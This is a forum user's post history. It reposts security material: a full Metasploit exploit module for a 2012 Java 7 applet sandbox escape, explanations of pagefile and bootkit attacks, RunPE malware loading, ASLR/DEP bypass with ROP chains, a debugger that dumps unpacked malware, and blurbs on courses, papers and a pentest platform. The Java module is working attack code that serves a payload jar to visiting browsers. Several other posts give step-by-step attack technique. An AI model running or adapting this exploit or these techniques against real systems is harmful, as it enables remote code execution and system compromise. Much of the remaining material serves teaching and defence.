Jump to content

ionut97

Active Members
  • Posts

    233
  • Joined

  • Last visited

  • Days Won

    14

Posts posted by ionut97

  1. This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'
    require 'rex'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({ :javascript => false })

    def initialize( info = {} )
    super( update_info( info,
    'Name' => 'Java 7 Applet Remote Code Execution',
    'Description' => %q{
    This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
    Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
    no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
    and Firefox across different platforms.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Unknown', # Vulnerability Discovery
    'jduck', # metasploit module
    'sinn3r', # metasploit module
    'juan vazquez', # metasploit module
    ],
    'References' =>
    [
    #[ 'CVE', '' ],
    #[ 'OSVDB', '' ],
    [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
    [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
    ],
    'Platform' => [ 'java', 'win', 'linux' ],
    'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
    'Targets' =>
    [
    [ 'Generic (Java Payload)',
    {
    'Arch' => ARCH_JAVA,
    }
    ],
    [ 'Windows Universal',
    {
    'Arch' => ARCH_X86,
    'Platform' => 'win'
    }
    ],
    [ 'Linux x86',
    {
    'Arch' => ARCH_X86,
    'Platform' => 'linux'
    }
    ]
    ],
    'DefaultTarget' => 0,
    'DisclosureDate' => 'Aug 26 2012'
    ))
    end


    def on_request_uri( cli, request )
    if not request.uri.match(/\.jar$/i)
    if not request.uri.match(/\/$/)
    send_redirect(cli, get_resource() + '/', '')
    return
    end

    print_status("#{self.name} handling request")

    send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
    return
    end

    paths = [
    [ "Exploit.class" ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
    1.upto(path.length - 1) do |idx|
    full = path[0,idx].join("/") + "/"
    if !(jar.entries.map{|e|e.name}.include?(full))
    jar.add_file(full, '')
    end
    end
    fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
    data = fd.read(fd.stat.size)
    jar.add_file(path.join("/"), data)
    fd.close
    end

    print_status("Sending Applet.jar")
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

    handler( cli )
    end

    def generate_html
    html = "<html><head></head>"
    html += "<body>"
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
    html += "</applet></body></html>"
    return html
    end

    end

    Sursa:http://www.exploit-db.com/exploits/20865/

    • Upvote 1
  2. Exploits 2: Exploitation in the

    Windows Environment

    Lab Requirements:

    Windows XP SP3 Virtual Machine with the following installed:

    Windows Platform SDK 7.0 or 7.1 (optional debugging tools need to be

    installed)

    Microsoft Visual C++ express 2008

    HXD hex editor

    Author Comments:

    This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs.

    • Upvote 1
  3. About the Pagefile Attack

    The pagefile attack is about to use the fact that Windows is swapping out memory into the pagefile. The attack is based on modification of the pagefile - so indirectly the physical memory. The idea is to find specific memory in the pagefile, modifying it, and letting Windows reloading it without any verification. But there are a few limitations to consider, the most important one is that you can not directly access the pagefile. The file "C:\pagefile.sys" is locked for access, you can not open it by CreateFile. The system process has an open handled without any Shared Access flag set, so any access to pagefile.sys will fail consequently.

    How to access the pagefile under Windows

    So how to access the pagefile? By bypassing the Windows File overhead. This can be done by not using the CreateFile/WriteFile functions but direct driver communication. Direct driver communication can be done through 2 ways (and the first is the Windows File Management again):

    CreateFile with a valid DOS device name or device name (i.e. "\\.\PhysicalDrive0")

    DeviceIoControl

    With the first you can open handles which can be used to send and receive (ReadFile, WriteFile) data to and from drivers. A driver can register a device name, and if you open a handle to the device you open a handle to the driver. Once opened, you can communicate with the driver, in the example you would directly do read/write operations on the hard disk (compare with Raw Sector Access). There was also an attack to physical memory, because the physical memory object "\Device\PhysicalMemory" was writable as non-Administrator in Windows XP (fixed in Service Pack 2).

    You can use the DeviceIoControl function to directly send control codes (IOCTLs, I/O Control Codes) to the driver. Control codes tell the driver what to do. For the function you also need an open handle, but in difference to file mapped driver communication you can open a handle with the correct, undocumented flags. After you opened a handle to the driver using CreateFile, you can send IOCTLs using DeviceIoControl.

    I'm glad to say that Microsoft started documenting the IOCTLs since late 2008, so there are now many documented IOCTLs in the connection with their next operating system Windows 7. The want people to NOT write drivers but use existing API functions. This is also a result from the fact that Windows Vista and newer only allow to load signed drivers, which means to have a company and pay for signing, and registering etc.

    So hows done the magic to access the pagefile? By using the correct IOCTLs and flags:

    Open handle to NTFS file system driver of the volume via CreateFile by specifying "\\.\C:\" as file name and FILE_READ_ATTRIBUTES as desired access flag

    Receive cluster list by calling DeviceIoControl with FSCTL_GET_RETRIEVAL_POINTERS IOCTL

    Calculate start sector and count by LCN (Logical Cluster Number), data run and NTFS volume info (Sectors per Cluster, Clusters per Record)

    Read the data runs directly using raw sector access

    Be sure to specify correct device name "\\.\[Drive Letter]:\" with the ending backslash, otherwise you would open a handle to the logical drive. The undocumented FILE_READ_ATTRIBUTES flag for the desired access allows you to send IOCTLs to the driver (but still forbids read/write IO). And this is exactly what we need, and what was done in the Pagefile Attack.

    You need to know about the internal NTFS file structure, how clusters are stored. There is a concept used called "Data Runs" (also appearing in FAT file system), which means that multiple clusters are stored and remembered in a list as one single data run. All runs together make the file. The list of the data runs is received by the IOCTL FSCTL_GET_RETRIEVAL_POINTERS, and each element consists of next VCN and LCN. Next VCN tells you the starting virtual cluster number (starting from zero) inside the file, and LCN the logical cluster number on the drive. This concept, receiving the cluster list with the IOCTL, works for both FAT and NTFS.

    I don't want to explain the full NTFS file system here but be aware of sparse data (= clusters which are fully zero, alpha compression), because they are not stored on NTFS but assigned as LCN -1. And do not forget compresson, encryption and resident data. Take a look at the NTFS documentation.

    Limitations

    Like given in my Hibernation File Attack, the Pagefile Attack has also its limitations. First you need elevated Administrator rights for the driver communication. Second the Pagefile Attack works only up to Windows XP, Microsoft fixed the vulnerability in Windows Vista Release Candidate in response to the public presentation of the pagefile attack. Furthermore its important to say that it is a relative high expenditure to find and replace specific memory in the pagefile, so it is only limited qualified for real exploits used by malware.

    References

    Vista RC2 vs. pagefile attack (and some thoughts about Patch Guard), Joanna Rutkowska in her blog "invisiblethings"

    Subverting Vista Kernel For Fun And Profit - presentation at Black Hat USA 2006

    Rutkowska's profile on Black Hat USA 2006

    Sursa:

    Pagefile Attack - Peter Kleissner

    • Upvote 1
  4. Abstract

    In my third paper I want to talk about "The Magic of Bootkits". Boot-Software was occupying me for years in my life time. I wrote an operating system, a boot management solution and at last a "Forensic Lockdown Software" which boots before Windows does. I have seen many stuff there and so I want to discuss a few points of bootkits, whether they become useless or not, whether they will rule the world or not. I am writing this article because I read Pandalabs Security article about "Rootkits in the MBR, a dangerous reality" and I have analyzed development work of vbootkit which I will discuss later. Enjoy reading!

    - Peter Kleissner, Software Engineer (September 2008)

    The dangerous of Bootkits

    Bootkits are loaded before the main operating system is. The term 'Bootkit' refers to a Rootkit installed in any Boot Record (Master Boot Record, Partition Boot Record, Bootloader). Modern Bootkits are able to hook and bypass operating system routines, initialization (processor mode switch) as long as security checks (integrity, code-signed, etc.). They are not only acting on startup, but also during execution of the host operating system. Because Bootkits are loaded before the OS is, they can do what they want (at least what the programmer is capable of letting them do). In normal they do not only hook operating system kernel functions but also give themself kernel rights and do other various things.

    How to consider Bootkits

    Bootkits differ in their code with common viruses, they are assigned like any other system software directly to machine code the processor executes. Simplified but like Windows they have to support the hardware by their own code, they need their own drivers for graphics, reading from disk etc. An important aspect of system software is the hardware platform and architecture. Boot viruses must be written for a specific architecture (for "normal" computers is the Intel Architecture and classical PC Architecture), so there is a hardware dependency normal software hasn't. Problems for boot viruses are not only the architecture, but the lacking documentation of it. For example, the boot process is a very undocumented way of, which makes it difficult to get a boot software working on nearly any machine. Different computers will support different important features which are required or not.

    You can consider bootkits as a high-changing required applications. Unstandardized hardware is one problem, but new standards for previous architecture parts another. We have for example the new GUID Partition Table which replaces the old one, or the BIOS thats ought to be replaced by EFI. For the new Extensible Firmware Interface, you can throw away any previous boot software and write new one.

    Another problem beside hardware dependency is target operating system dependency-, the bootkit has to hook operating systems kernel functions and bypass the operating systems security functions. Current bootkits are targeted to operating system versions like specific to Windows XP, Windows Vista or some Linux Kernel. Its also tricky with 32 and 64 bit of operating system versions. It would be possible, but currently not used to include binary code for both different operating system versions.

    How to detect a Bootkit

    For bootkit detection, I've already worked out a concept for detecting malicious boot software, described in my article Writing a Boot Scan Engine. It's about to scan for patterns, using a black and whitelist, a database, reports and other heuristic methods. When detecting an infected system for a bootkit it is important to know the bootkit is able to hook functions that are used for detection. An example would be the common hooked function ReadFile, which would - in case - return different data then the real one. Of course the computer can be scanned from a live system, but this would be unuserfriendly crap. A solution would be a scanner which is loaded before the main operating system parts are loaded, a place for the scanner would be (Windows specific) in the Windows Bootloader or the Winloader.exe.

    The problem of Bootkits in the future with EFI

    A big change for boot viruses relies in the change of the old-fashioned BIOS to the new Extensible Firmware Interface (EFI). It makes the old BIOS and bootstrap obsolete and defines new standards for booting operating systems. For the first, old boot viruses will no longer work and can not be "translated" to the new boot system. For the second, we will have much more boot viruses in future within the next 10 years. With new versions of Microsofts operating systems they will explode, because they have the ability to. EFI makes it very easy to develop a boot loading software- or to develop a boot virus or bootkit.

    EFI brings better and more standardized support for hardware and supports features like the Portable Executable format that is used in Windows for executables. It's just a matter of time until we have easy to use compilers like Visual Studio for developing EFI applications. When we have this, it's very easy to copy & paste malicious boot software source code. I think the explosion will come in 2-3 years until EFI is etablished and people begin to use its possibilities.

    Conclusion

    We see a current change in bootkits and in the development of it in the near future. It's incredible to see the effort people are taking to in order to write a full functional bootkit. The good thing on previous bootkits is only experts are capable of writing them, so modern malicious bootkits (the non proof-of-concept ones) are simply not available this time. In 2-3 years we will see a change in bootkits when EFI is etablished, but until EFI applications are nearly like Windows applications, they can be easily found by anti-virus software. See you in 2-3 years, Peter Kleissner.

    Sursa:

    The Magic of Bootkits - Peter Kleissner

    • Upvote 1

  5. The Art of Bootkit Development
    Peter Kleissner

    Windows 8 Bootkit Live Demonstration

    This shows how to use Stoned Lite to get SYSTEM rights on Windows 8 through the cmd privilege escalation (done by a driver loaded by the bootkit). The infector is just 14 KB of size and bypasses the UAC.
  6. Google Chrome 22 include mai putine noutati decat versiunea precedenta a browserului Google, dar una dintre ele este cu adevarat notabila: un plugin ce mareste securitatea Flash pentru Windows.

    Vulnerabilitatile Adobe Flash sunt una dintre exploatarile folosite cel mai de des de aplicatiile malware, insa Google Chrome 22 includ plugin-ul Peppet (PPAPI), ce ofera cea mai mare siguranta impotriva virusilor, scrie Geek.

    pepper-flash-580x250_jpg.jpg

    Google Chrome 22 imbunatateste securitatea Flash pentru Windows

    Noul plugin Flash din Google Chrome 22 ruleaza in acelasi sandbox considerat pana acum invulnerabil in fata tentativelor de hacking, iar PAPPI a redus si numarul de erori cauzate de Flash cu 20%.

    Versiunea de Linux a Google Chrome foloseste plugin-ul Flash de mai bine de 2 luni, dar acum securitatea sporita soseste si pe Windows 7 si Windows 8. Google Chrome este singurul browser ce poate afisa continut Flash in interfata Metro in afara de Internet Explorer 10, in care Flash functioneaza doar pe un numar redus de pagini.

    Sursa:

    Google Chrome 22 imbunatateste securitatea Flash pentru Windows | Hit.ro

  7. RunPE in a nutshell

    RunPE is a technique often used by (novice) virus authors to hide their viruses from an anti-virus scanner. It works by using a small launcher application that has the executable virus file embedded in an encrypted state. The easiest way to launch the executable would be to write a decrypted version of the virus to a file, but this would give the anti-virus scanners a chance to detect and subsequently disable it. Instead, the RunPE loader runs an innocent application and replaces its loaded process image with the virus.

    To understand the reasoning in the rest of the document, it's important that you understand how running a process from a memory buffer works from a technical point of view.

    First, the RunPE loader launches an innocent process using the CreateProcess API. The process is launched using the CREATE_SUSPENDED flag. This will suspend the process right after it is mapped into memory, but before the windows PE loader loads all additional library files.

    Next, the RunPE loader calls GetThreadContext on the main thread of the newly created process. The returned thread context will have the state of all general purpose registers. The EBX register holds a pointer to the Process Environment Block (PEB), and the EAX register holds a pointer to the entry point of the innocent application. In the PEB structure, at an offset of eight bytes, is the base address of the process image.

    The loader calls NtUnmapViewOfSection. This function will unmap all the mapped sections of the innocent executable, freeing up the memory space for the virus to be mapped in.

    Then the loader reads the headers of the decrypted virus, and maps the headers and all sections into the innocent process using WriteProcessMemory. The correct memory page permissions are set using VirtualProtectEx.

    The loader writes the new base address into the PEB and calls SetThreadContext to point EAX to the new entry point.

    Finally, the loader resumes the main thread of the target process with ResumeThread and the windows PE loader will do it's magic. The executable is now mapped into memory without ever touching the disk.

    Plan of attack

    The weaknesses of RunPE should be obvious to anyone: At some point the loader has to decrypt the excutable in the loader's memory space. Furthermore, the original executable will be mapped in the target process' memory space in a readable state, you can easily dump the executable into a file. My first instinct was to try OllyDBG with the OllyDump plugin. Sadly, the RunPE loader left the process in a mutilated state, causing the plugin to fail.

    Another way to solve the problem would be forcing the RunPE loader to write the executable to a file instead of to the memory space of another process. The easiest way to achieve this is by hooking the WriteProcessMemory calls. You have to place the hooks before the RunPE loader ever gets control of execution, this proved to be quite challenging when the RunPE loader is written in a .NET language (and it often is, the people using this technique usually aren't very good at what they do).

    To solve this I decided to create my own debugger application that places an int3 breakpoint on WriteProcessMemory and reads the required data straight from the RunPE loader process with ReadProcessMemory.

    The Source

    The code I have so far does its job but is quite dirty. There is no real design behind it, I just started coding and fixing stuff as I thought about it. It also doesn't yet create a real decrypted executable but instead creates binary files for each WriteProcessMemory call. I haven't tested how anti debugger techniques react on this debugger yet. IsDebuggerActive() will return true for sure, but that can easily be prevented. How it reacts on tricks with exception handlers is something I have to test. I'd like to eventually expand this code to some sort of simple debugger framework where you can execute callback functions for every breakpoint. Not sure if I'll ever be motivated enough though.

    C:\>debugger.exe target.exe
    Process target.exe Loaded at 00400000
    Handling exception chain...
    Unknown Breakpoint at 7C90120E
    Creating breakpoint (WriteProcessMemory) at 7C802213
    Handling exception chain...
    Exception at 7C812AFB type 4242420
    Handling exception chain...
    Breakpoint (WriteProcessMemory) at 7C802213
    getting stack...
    WriteProcessMemory was called at address 4000000 on buffer b3adf8 with length 14

    Process closed with exit code 0

    C:\>cat 4000000.bin
    Hello this is a test
    C:\>

    #include <iostream>
    #include <string>
    #include <map>
    #include <vector>
    #include <iomanip>
    #include <sstream>
    #include <algorithm>
    #include <functional>
    #include <fstream>

    #include <Windows.h>
    #include <TlHelp32.h>

    typedef void (*BreakpointCallback)(HANDLE proc, HANDLE thread);

    struct Breakpoint
    {
    std::string name;
    unsigned char originalBytes[2];
    BreakpointCallback callback; // Not yet used
    };

    typedef std::map<std::string, MODULEENTRY32> ModuleMap;
    typedef std::map<void *, Breakpoint> BreakMap;

    bool DumpDataToFile(HANDLE proc, DWORD address, DWORD bufferAddress, DWORD length)
    {
    std::stringstream filename;
    filename << std::hex << address << ".bin";
    std::ofstream outfile(filename.str(), std::ofstream::binary | std::ofstream::trunc);

    char *buffer = new char[length];
    ReadProcessMemory(proc, reinterpret_cast<void *>(bufferAddress), buffer, length, NULL);
    outfile.write(buffer, length);
    delete[] buffer;
    return false;
    }

    bool UpdateModuleList(int pid, ModuleMap& moduleList)
    {
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid);
    if(snap == INVALID_HANDLE_VALUE)
    return false;

    MODULEENTRY32 me;
    moduleList.clear();
    Module32First(snap, &me);
    do
    {
    std::string key = me.szModule;
    std::transform(key.begin(), key.end(), key.begin(), std::ptr_fun<int, int>(tolower));
    moduleList[key] = me;
    } while (Module32Next(snap, &me));

    return true;
    }


    // I only place breakpoints on WINAPI functions so I write 2 bytes:
    // mov edi,edi becomes int3
    // nop
    // so I don't need to do anything special to handle the breakpoint, it will just continue with the nop
    // and then follow the function prologue
    bool ToggleInt3Breakpoint(void *address, std::string name, BreakMap& breakList, HANDLE proc)
    {
    BreakMap::iterator bpit = breakList.find(address);

    if(bpit != breakList.end())
    {
    // Rewove existing BP
    std::cout << "Removing breakpoint (" << bpit->second.name << ") at " << address << std::endl;

    if(!WriteProcessMemory(proc, address, bpit->second.originalBytes, 2, NULL))
    return false;

    breakList.erase(address);
    }
    else
    {
    // Create new BP
    Breakpoint bp = {name, 0, 0, NULL};
    std::cout << "Creating breakpoint (" << name << ") at " << address << std::endl;
    if(!ReadProcessMemory(proc, address, bp.originalBytes, 2, NULL))
    return false;

    if(!WriteProcessMemory(proc, address, "\xCC\x90", 2, NULL))
    return false;

    breakList[address] = bp;
    }
    return true;
    }

    bool PlaceBreakpoints(ModuleMap& moduleList, BreakMap& breakList, HANDLE proc)
    {
    ModuleMap::iterator kernel32 = moduleList.find("kernel32.dll");
    if(kernel32 != moduleList.end())
    {
    void *wpmAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
    ToggleInt3Breakpoint(wpmAddress, "WriteProcessMemory", breakList, proc);
    return false;
    }
    else
    return true;
    }

    bool GetStack(int slots, HANDLE thread, HANDLE proc, std::vector<DWORD>& stack)
    {
    CONTEXT context;
    context.ContextFlags = CONTEXT_ALL;

    std::cout << "getting stack..." << std::endl;

    if(!GetThreadContext(thread, &context))
    return false;

    for(int i = 0; i < slots; i++)
    {
    DWORD slot;
    if(!ReadProcessMemory(proc, reinterpret_cast<void *>(context.Esp + (i * 4)), &slot, sizeof(DWORD), NULL))
    return false;
    stack.push_back(slot);
    }

    return true;
    }

    // We handle the breakpoints here (and potential other exceptions)
    void HandleException(DEBUG_EVENT de, BreakMap& breakList, HANDLE proc)
    {
    std::cout << "Handling exception chain... " << std::endl;
    EXCEPTION_RECORD *exception = &de.u.Exception.ExceptionRecord;

    do
    {
    BreakMap::iterator bp = breakList.find(exception->ExceptionAddress);
    if(exception->ExceptionCode == EXCEPTION_BREAKPOINT && bp != breakList.end())
    {
    std::cout << " Breakpoint (" << bp->second.name << ") at " << exception->ExceptionAddress << std::endl;

    if(bp->second.name == "WriteProcessMemory")
    {
    std::vector<DWORD_PTR> stack;
    HANDLE thread = OpenThread(THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION, false, de.dwThreadId);
    GetStack(6, thread, proc, stack);
    CloseHandle(thread);
    std::cout << "WriteProcessMemory was called at address " << stack[2]
    << " on buffer " << stack[3]
    << " with length " << stack[4] << std::endl;
    DumpDataToFile(proc, stack[2], stack[3], stack[4]);
    }
    }
    else if(exception->ExceptionCode == EXCEPTION_BREAKPOINT)
    std::cout << " Unknown Breakpoint at " << exception->ExceptionAddress << std::endl;
    else
    {
    std::cout << " Exception at " << std::hex << exception->ExceptionAddress << " type " << exception->ExceptionCode << std::endl;
    MessageBeep(0);
    Sleep(100);
    }
    } while (exception = exception->ExceptionRecord);
    }

    int DebugMain(std::string targetPath)
    {
    STARTUPINFO si = {0};
    si.cb = sizeof(si);
    PROCESS_INFORMATION pi;

    if(!CreateProcess(targetPath.c_str(), NULL, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, ?))
    {
    std::cerr << "Error while creating process: " << GetLastError() << std::endl;
    return EXIT_FAILURE;
    }

    DEBUG_EVENT de;
    bool keepLooping = true;
    bool needBreakpoints = true;
    ModuleMap moduleList;
    BreakMap breakList;

    while(keepLooping && WaitForDebugEvent(&de, INFINITE))
    {
    switch(de.dwDebugEventCode)
    {
    case LOAD_DLL_DEBUG_EVENT:
    case UNLOAD_DLL_DEBUG_EVENT:
    UpdateModuleList(pi.dwProcessId, moduleList);
    break;
    case CREATE_PROCESS_DEBUG_EVENT:
    std::cout << "Process " << targetPath << " Loaded at " << de.u.CreateProcessInfo.lpBaseOfImage << std::endl;
    break;
    case EXIT_PROCESS_DEBUG_EVENT:
    std::cerr << "Process closed with exit code " << std::hex << de.u.ExitProcess.dwExitCode << std::endl;
    keepLooping = false;
    break;
    case EXCEPTION_DEBUG_EVENT:
    HandleException(de, breakList, pi.hProcess);
    break;
    default:
    break;
    }

    // Place breakpoints as soon as kernel32 is loaded
    if(needBreakpoints)
    needBreakpoints = PlaceBreakpoints(moduleList, breakList, pi.hProcess);

    ContinueDebugEvent(de.dwProcessId, de.dwThreadId, DBG_CONTINUE);
    }
    return EXIT_SUCCESS;
    }

    int main(int argc, char **argv)
    {
    if(argc != 2)
    {
    std::cerr << "Usage: " << argv[0] << " <executable path>" << std::endl;
    return EXIT_FAILURE;
    }

    return DebugMain(argv[1]);
    }

    Sursa:

    https://thunked.org/programming/decrypting-runpe-malware-t110.html

    • Upvote 1

  8. Description: In this video Machael Buselli talking about Blind SQL Injection and some ways that how attackers can inject malicious behavior to gather information from your system for bad propose. Michael Buselli's talk begins by briefly discussing the dangers and counter-measures of SQL injection. It then focuses on a particular, little known variant called blind SQL injection that is often overlooked. This talk is full of examples which show the dangers of SQL and blind SQL injection.
    Machael Buselli: - Michael is a software developer that also has significant experience in systems administration and security architecture. Michael presently works as a Ruby on Rails consultant at Aon Hewitt.
    Source : - Blind SQL Injection w/Michael Buselli - software craftsmanship mchenry county

    Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
    Original Source: SCMC August 2011- Blind SQL Injection by Michael Buselli on Vimeo
  9. AEG: Automatic Exploit Generation on Source Code

    The automatic exploit generation challenge we address is given a program, automatically find security-critical bugs and generate exploits. Our approach uses a novel formal verification technique called preconditioned symbolic execution to make automatic exploit generation more scalable to real-world programs than without it. We implemented our techniques in a system called AEG, which we use to automatically generate 16 exploits for 14 open-source projects. Two of the generated exploits are against previously unknown vulnerabilities.

    The hard part, in our experience, was exploring the state space efficiently to find bugs, determine the problem, and generate an initial input that triggers the bug. The core of our paper is a technique called preconditioned symbolic execution, which provides better scalability for finding exploitable bugs than when using previous symbolic execution techniques. The main idea is to guide symbolic execution to program paths that are more likely to be exploitable. Basic symbolic execution tends to try and explore all paths, which is more expensive. Our implementation is built on top of KLEE, a great symbolic execution engine from researchers at Stanford.

    We are very excited about these results, and think they show a real step forward in state of the art. Don't take this to mean we believe it's a solved problem. Our future work focuses on scaling to larger and more programs, to more types of exploits, and to other relevant problem settings. There is plenty still to do.

    We presented our paper at NDSS 2011.

    The most current copy of our paper. PDF BiBTeX

    Help us find typos in our paper and join our thank you list.

    The camera-ready version for NDSS. The above is the update; this is here mostly for historical reasons. PDF

    For those of you interested in watching, we've prepared a youtube video of our experiments.

    We have a short talk that gives a high-level overview of our take on the problem, the direction, and our project. Also note that due to youtube time lengths, we left out several important things such as the related work. That stuff is important, but we just couldn't fit everything in. Please see the paper for more information.

    As a random link related to exploits, CMU runs a Capture the Flag team. See their website :: Plaid Parliament of Pwning ::.

    Sursa:

    http://security.ece.cmu.edu/aeg/

  10. More recently I have researched methods on bypassing two security protection mechanisms under windows that have proven quite difficult. Whist this is nothing new, I will provide the understanding I have of the techniques and show you a brief demonstration of the approach I took. We will discuss this techniques in relation to stack based buffer overflows only for now. What is interesting is that each one protection mechanism individually are not difficult to bypass, just when they are combined together we are presented with a difficult hurdle. Lets investigate why, by explaining what the security mechanisms actually do and then using a proof of concept to help readers visualize the process.

    What is ASLR?

    Address space localization randomization is nothing more than randomizing the high byte order of any address within the PEB (process environment block). Generally under windows XP and prior versions we see addresses that never change under the windows libraries. So for example the address from kernel32.dll for WriteProcessMemory() will always be at 0x7C802213. But of course, newer versions of windows have changed this, so that now an address will be randomize like this: 0xXXXX2213 (The offset will be different too under Vista and 7, this is just an example).

    One important point too make is that we will always know the offset too where the functions lye in any given module. This is known as the relative offset, and will come into play when we attempt to bypass this security. Ok so as you can see, in a typical EIP or SEH exploit, we would not have too many dramas bypassing this as a lot of modules that come with applications are not using ASLR and essentially we could just find an instruction that will take us too our attacker controlled buffer. However if our target application came with no additional modules, or they were all ASLR protected, or loaded with a dynamic base (using nulls) then we would have serious issues bypassing this technology. We are generally more than unlikely too see this situation due to compatibility issues.

    ASLR Bypass techniques:

    Bruteforcing (as long as the parent process spawns child processes). Generally, this would only be possibly in server environments. Entropy is small in 32bit processors.

    Using a call to a DEP bypassing function from within a non ASLR module. This way we dont even have to know the address at all, we can rely on code that comes inside the applications modules.

    Leak an pointer to a windows modules from the stack or heap memory. As long as we can create the relevant chains, then this process works.

    While this is nice, we will face another hurdle. Hardware enforced data execution prevention, that will stop the execution of attacker supplied code in memory.

    What is DEP?

    DEP is a CPU flag set to indicate that the NX is on (non-executable). Any attacker supplied code in either the heap or stack memory will not be executed and cause an access violation. For an attacker to bypass this issue they must execute a ret2libc type exploit where the attacker uses system API's to mark memory pages as executable or move the shellcode to an executable region and jump on it. In a stack based exploit, this will require the attacker to use a technique called Return Oriented Programming (ROP). This will allow an attacker to continually return to the stack and execute the next instruction until the shellcode is executed.

    DEP Bypass techniques using windows API:

    WriteProcessMemory()

    WinExec()

    VirtualProtect()

    The three API functions above, will enable the attacker to control the execution of shellcode. I will not go into detail about these functions as there is already a lot of material on the subject. Its important to point out that WinExec() will not execute a traditional payload and you will have to be creative with this technique if that's all you can use.

    Limitations:

    Less character filtering the better (limited character set means limited ROP chains.)

    Need lots of space. Although this is not ALWAYS the case, generally speaking we will need a decent amount of room for generating the stage 0 shellcode (the ROP chain).

    We need at least one library that is not ASLR protected (That also does not have a randomized base (although this will make is VERY hard, still not impossible)).

    Due to these limitations alone, many applications under the new Windows OS's will not be exploitable (assuming DEP is on). Unicode vulnerabilities, ASCII vulnerabilities, and Vulnerabilities where one no additional libraries can be provided will not work.

    Putting it all together, visualize!

    First and foremost, you need to be able to 'visualize' how the exploitation will pan out. You need a plan from start to finish and be willing to change your plan completely is need be. First of all, get yourself some ROP chains either by using !pvefindaddr or by manually searching. Once you have that, visualize this process:

    Find an address to kernel32.dll (Leak, brute-forcing or call to windows API from the applications non ASLR modules. etc)

    Store the address somewhere

    Calulate the dynamic arguments for your windows API call (that will be used to bypass DEP).

    Place them carefully either in the Data segment or the stack segment

    Align them correctly and call the function

    The handler will return us to the location we specified (unless your using the WriteProcessMemory() technique that patches itself.)

    Blaze DVD (.plf) file local buffer overflow PoC Vid download here

    Sursa:

    https://net-ninja.net/article/2010/Jun/17/bypassing-aslr-and-dep/

  11. “Choose a job you love, and you will never have to work a day in your life” said Confucius. These would be the words that describe Marius Corîci the most. In 2003 he started doing business in the plumbing industry and co-founded ITS Group, a franchise for Romstal Company, the biggest plumbing installations retailer from South-Eastern Europe. In 2007 he moved into Artificial Intelligence field and founded Intelligentics, a group for Natural Language Processing. Now, he is very focused on infosec and got involved in all the biggest independent security projects in Romania: S3ntinel, Hack Me If You Can, Hack a Server and DefCamp.

    Marius considers himself a serial entrepreneur and is very passionate about Artificial Intelligence. Never a quitter, always a perfectionist, looking for challenges that will change the world we live in. He believes in people and the power of great teams, and he intends to start blogging in the near future.

    What determined you to shift your attention towards software development industry?

    Besides the great opportunities, I am a guy who loves challenges. I started to like developing digital products and I belive that the online industry will increase growth in the near future.

    Hacking Servers

    logo-3db40805e4eb25f111aa1049a4b1ba5e.png

    What is Hack a Server?

    HaS (Hack a Server) is a platform designed for conducting manual penetration tests using the power of crowdsourcing, covered by anonymity and confidentiality.

    It's a fact that communities and individuals who love to discover and test security issues already exist. Whether they are called black, grey or white hackers, crackers, skiddies, PenTesters you name it, they love to find flaws and vulnerabilities. They love challenges and every flaw or vulnerability represents a challenge for them. This is the truth.

    When your system or production server gets hacked in real life, peaceful intentions are the least to expect. Trust me, we’ve been there having our platform “tested” and tested. Thanks God we don’t keep any sensitive data about our users on the platform.

    HaS brings security skilled people in the same place and gets them paid for what they love doing most: Hacking. Everybody can register to our platform, but only the best will have access to “Playground Arena”, where all the hacking happens.

    In order to get access to the “Playground Arena”, they will first have to pass a test. We all know that the most important thing when someone finds holes into your system is not the penetration itself but the report that describes the security issues and the solutions. That report is the most important thing for a CTO, Sys Admin or web app developer.

    The test that a HaS user has to pass in order to get access for hacking, is like any other tests that they should pass in order to get different security certificates (e.g. CPTC, OSPC, CEH, CEPT, CISSP etc). The only difference is that we give this opportunity to all our users and we don’t charge for it. This test ensures CTOs, Sys Administrators and web apps developers that whenever they will pay and receive a Penetration Test Report, it will comply Penetration Test Standard Reports.

    How did you come up with the idea behind HaS platform?

    I use to say: Solve a problem, then, build a product. There were two ingredients that make me come up with this idea:

    Gaming: I hate gaming because if you are not aware, it's like a drug.

    Security: Security is one big problem, believe me.

